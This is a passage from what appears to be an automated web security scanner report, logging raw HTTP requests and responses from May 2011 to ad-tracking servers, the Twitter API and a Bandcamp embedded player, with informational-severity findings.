rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYm9WOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:40 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY-biQzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:40 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:40 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
12.3. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Request 1

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response 1

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F4FA[CE]; Expires=Sat, 7 May 2016 14:06:50 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:50 GMT
Last-Modified: Tue, 10 May 2011 14:06:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www290
Content-Length: 0
Content-Type: text/plain

Request 2

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response 2

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:09:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F595[CE]; Expires=Sat, 7 May 2016 14:09:25 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&g=none&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:09:25 GMT
Last-Modified: Tue, 10 May 2011 14:09:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www253
Content-Length: 0
Content-Type: text/plain

12.4. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Request 1

GET /1/statuses/user_timeline.json?screen_name=OSentinelBiz&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304949572397=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304949575-25240-22084
X-RateLimit-Limit: 150
ETag: "98aaceed48e4ccd42b79709e9f443154"-gzip
Last-Modified: Mon, 09 May 2011 13:59:35 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02358
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4477c3eabd09e879d2fca4f211d0ecb1dcbd8643
X-RateLimit-Reset: 1304953175
Set-Cookie: original_referer=ZLhHHTiegr8aia0pL5vMr3kk%2BX%2BcqR3rsxppA%2FovyVCexTmcz%2FMvOkAXJR%2BHAK6zSrw43nllCDgN7RfPnnkGWrD0tlGHXcKgXzEfbM%2FnZyY2aQU3pk7AwQ%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHpODtUvAToHaWQiJTRlZDg4ODBjZGUyYTBl%250ANDIwNTIwZGMzMTllNmI5N2M0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--f79c0141fe922e790699a68ff50019e9d67d29da; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 8808

TWTR.Widget.receiveCallback_1([{"text":"How local stations will cover #CaseyAnthony trial. http:\/\/bit.ly\/m7l2jo #media","coordinates":null,"truncated":false,"id_str":"67586194652930048","source":"web","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 13:46:19 +0000 2011","contributors":null,"user":{"default_profile_image":false,"profile_use_background_image":true,"default_profile":false,"statuses_count":388,"following":null,"profile_background_color":"EDECE9","description":"Central Florida's leading source for business, technology and consumer news. Be the first to know when business news happens -- text OSBIZ to 43886. ","screen_name":"OSentinelBiz","profile_background_image_url":"http:\/\/a2.twimg.com\/profile_background_images\/191413454\/x562a42969f39cc560ae5a79a392dc5c.jpg","follow_request_sent":null,"verified":false,"friends_count":850,"id_str":"236849001","profile_text_color":"634047","location":"Orlando, FL","profile_sidebar_fill_color":"E3E2DE","is_translator":false,"profile_background_tile":false,"url":"http:\/\/www.orlandosentinel.com\/business","listed_count":31,"contributors_enabled":false,"lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Eastern Time (US & Canada)","created_at":"Tue Jan 11 14:21:07 +0000 2011","profile_link_color":"088253","name":"OSentinelBiz","show_all_inline
...[SNIP]...

Request 2

GET /1/statuses/user_timeline.json?screen_name=OSentinelBiz&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304949572397=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304949582-12301-51426
X-RateLimit-Limit: 150
ETag: "98aaceed48e4ccd42b79709e9f443154"-gzip
Last-Modified: Mon, 09 May 2011 13:59:42 GMT
X-RateLimit-Remaining: 122
X-Runtime: 0.01829
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8f0ccd48c62f4c122a2d63bfbb18760efe7d9d8f
X-RateLimit-Reset: 1304953175
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA9sDtUvAToHaWQiJWY5OTdmYTg2NTZiN2Nm%250AODdhMjM5NzVkOTE5Zjk1YWI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--43ce3e84a5845521567df5dee760fbc817d3b7a0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 8808

TWTR.Widget.receiveCallback_1([{"text":"How local stations will cover #CaseyAnthony trial. http:\/\/bit.ly\/m7l2jo #media","coordinates":null,"truncated":false,"id_str":"67586194652930048","source":"web","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 13:46:19 +0000 2011","contributors":null,"user":{"default_profile_image":false,"profile_use_background_image":true,"default_profile":false,"statuses_count":388,"following":null,"profile_background_color":"EDECE9","description":"Central Florida's leading source for business, technology and consumer news. Be the first to know when business news happens -- text OSBIZ to 43886. ","screen_name":"OSentinelBiz","profile_background_image_url":"http:\/\/a2.twimg.com\/profile_background_images\/191413454\/x562a42969f39cc560ae5a79a392dc5c.jpg","follow_request_sent":null,"verified":false,"friends_count":850,"id_str":"236849001","profile_text_color":"634047","location":"Orlando, FL","profile_sidebar_fill_color":"E3E2DE","is_translator":false,"profile_background_tile":false,"url":"http:\/\/www.orlandosentinel.com\/business","listed_count":31,"contributors_enabled":false,"lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Eastern Time (US & Canada)","created_at":"Tue Jan 11 14:21:07 +0000 2011","profile_link_color":"088253","name":"OSentinelBiz","show_all_inline_media":false,"geo_enabled":false,"profile_sidebar_border_color":"D3D2CF","id":236849001,"utc_offset":-18000,"favourites_count":0,"profile_image_url":"http:\/\/a2.twimg.com\/p
...[SNIP]...
12.5. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

Request 1

GET /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB// HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 303 See Other
Date: Mon, 09 May 2011 14:07:25 GMT
Location: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=B19E03FF5E8534E71DA55EB294CAD1653B3E3289; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:25 GMT
Connection: Keep-alive
Content-Length: 430

